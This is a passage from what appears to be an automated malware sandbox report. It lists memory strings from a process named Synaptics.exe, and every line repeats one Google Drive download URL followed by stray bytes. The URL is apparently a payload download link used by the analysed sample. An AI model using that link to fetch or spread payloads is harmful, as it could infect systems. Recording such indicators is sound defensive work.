00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                Source: Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0%
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0(
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download04
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0:
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0AntC
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Jn
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0On~
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0px;min-height:180px;paddi
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1?
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1W
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2;
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.000000000064D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3q
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4E
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4N
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMY
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNd
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOKzr
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO_
                                Source: Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOp
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOs
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOt
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2253029692.000000000E8FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPB
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPG
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPH
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPoJe
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ4
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQKSD
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQy
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR.xls$
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR.xlsvE
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRDera
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRHgs
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS;
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSecurk
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSr
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSw
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT5
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT?
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTA
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTF2wN
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTK2z
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTdpsW
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUpdat
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUser
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV?
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVAgs
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVlVsO
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.000000000064D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW;Y
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWv
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2293703674.000000001D3BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2275741139.00000000148FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXA6tA
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXJ6
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXO6~
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYHhs
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ#
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ_
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_p
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_u
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada-wow
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaNh
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada_
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada~
